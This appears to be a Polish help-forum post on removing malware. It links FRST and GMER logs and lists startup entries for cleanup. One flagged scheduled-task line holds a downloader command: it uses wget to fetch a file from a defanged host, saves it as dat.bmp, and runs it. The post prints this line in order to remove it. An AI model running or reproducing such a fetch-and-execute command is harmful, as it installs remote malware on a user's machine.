LOG Z FRST http://www.wklej.eu/index.php?id=90da0ecd92
Addition http://www.wklej.eu/index.php?id=9103cf09d8
Shortcut http://www.wklej.eu/index.php?id=d1f68d0a2e
Log z GMER http://www.wklej.eu/index.php?id=eb727182cc
UA: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
UA: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Task: {5B94BB5D-F56C-4DEC-A845-2C75FF5551FE} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=EwdBTPL0MP;Minecraft_1.8.1_Setup.exe;1452617835 & start cmd /R dat.bmp <==== UWAGA
C:\ProgramData\wget.exe
2017-03-30 15:32 - 2017-03-30 17:03 - 00000000 ____D C:\AdwCleaner
HKU\S-1-5-21-2756060167-294891085-3003495681-1001\...\Run: [ALLUpdate] => C:\Program Files (x86)\ALLPlayer\ALLUpdate.exe [3510704 2014-04-17] (ALLPlayer Group Ltd.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-07-11] (Oracle Corporation)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2012-10-25] (Apple Inc.)
HKLM-x32\...\Run: [UpdateP2GShortCut] => C:\Program Files (x86)\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe [217088 2012-04-18] (CyberLink Corp.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\Lenovo\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [112512 2010-03-13] (Microsoft Corporation)
EmptyTemp:
Zarejestrowani użytkownicy: Bing [Bot]